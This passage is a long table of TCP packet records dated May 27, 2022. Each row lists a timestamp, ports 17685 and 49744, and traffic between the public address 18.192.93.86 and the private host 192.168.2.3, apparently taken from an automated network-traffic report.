May 27, 2022 19:28:21.148777008 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.148863077 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.148910046 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.168435097 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.168493032 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.168520927 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.168540955 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.168647051 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.168680906 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.168728113 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.168762922 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.168858051 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.168984890 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169061899 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169081926 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169135094 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169162035 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169244051 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169312000 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169373989 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169459105 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169497013 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169514894 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169565916 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169589996 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169682980 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169703007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169770002 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169800043 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.169838905 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.169903040 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187380075 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187488079 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187494993 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187520027 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187635899 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187675953 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187808990 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187880039 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187891006 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187928915 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187947035 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.187963009 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187985897 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.187987089 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188024998 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188041925 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188059092 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188096046 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188236952 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188271999 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188324928 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188333035 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188360929 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188361883 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188397884 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188420057 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188436031 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188448906 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188472033 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188488007 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188514948 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188528061 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188555002 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188565016 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188601017 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188635111 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188683033 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188716888 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188750029 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188782930 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188796043 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188808918 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188862085 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188879013 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188890934 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188894033 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.188924074 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.188965082 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.189003944 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.189029932 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.189052105 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.189068079 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.189085007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.189111948 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.189167976 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.189171076 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.189227104 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.206769943 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.206866980 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207182884 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207202911 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207217932 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207232952 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207248926 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207267046 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207282066 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207297087 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207302094 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207313061 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207329035 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207345009 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207361937 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207371950 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207376957 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207392931 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207410097 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207417965 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207421064 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207438946 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207447052 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207458019 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207467079 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207477093 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207490921 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207493067 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207506895 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207510948 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207514048 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207526922 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207528114 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207545042 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207561970 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207598925 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207600117 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207629919 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207653999 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207679987 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207681894 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207737923 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207778931 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207796097 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207839012 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207851887 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207861900 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207870007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207886934 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.207911968 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207952976 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.207974911 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208009958 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208022118 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208040953 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208051920 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208058119 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208122015 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208127975 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208143950 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208165884 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208194971 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208219051 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208254099 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208271027 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208286047 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208317041 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208338022 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208355904 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208370924 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208381891 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208406925 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208412886 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208429098 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208444118 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208448887 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208492041 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208508968 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208519936 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208535910 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208561897 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208561897 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208600998 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208601952 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208646059 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208657026 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208674908 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208693981 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208715916 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208748102 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208769083 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208801985 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208811998 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208858013 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.208870888 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208924055 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.208933115 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.209006071 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.209100962 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.209121943 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.209142923 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.209160089 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.209161997 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.209191084 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.209244967 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.226675987 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.226705074 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.226826906 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.226907969 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227020025 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227040052 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227056980 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227072001 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227087975 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227118015 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227174997 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227199078 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227215052 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227235079 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227250099 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227266073 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227269888 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227283955 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227299929 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227314949 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227329969 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227344990 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227363110 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227377892 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227384090 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227392912 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227411032 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227426052 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227427959 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227443933 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227456093 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227484941 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227500916 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227519035 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227524042 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227561951 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227588892 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227591038 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227648020 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227654934 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227708101 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227735043 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227790117 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227794886 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227843046 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227874994 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227879047 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227896929 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227911949 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227936029 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227952003 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.227962017 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227983952 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.227986097 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228034019 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.228060961 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.228236914 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228313923 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.228725910 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228744984 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228760958 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228825092 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.228837013 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228852034 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228863001 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.228871107 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.228919029 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.228991985 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.229018927 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229079962 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.229192019 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229248047 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.229505062 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229589939 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.229722977 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229803085 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.229846954 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229865074 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229887009 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.229923010 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.229934931 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230093002 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230108976 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230143070 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230165958 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230185986 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230206966 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230263948 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230272055 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230293036 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230298996 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230314016 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230328083 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230334044 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230335951 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230360031 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230380058 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230380058 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230400085 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230408907 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230441093 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230483055 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230501890 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230529070 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230562925 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230576038 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230583906 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230602026 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230621099 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230640888 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230659962 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230664968 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230678082 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230681896 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230703115 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230726004 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230731010 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230746984 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230752945 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230767965 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230786085 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230791092 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230808973 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230811119 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.230854034 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230879068 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230890036 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230971098 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.230992079 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.231009007 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.231021881 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.231156111 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248003006 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248038054 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248060942 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248084068 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248104095 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248106003 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248126030 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248145103 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248147964 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248156071 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248169899 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248172045 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248192072 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248213053 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248224974 CEST	49744	17685	192.168.2.3	18.192.93.86
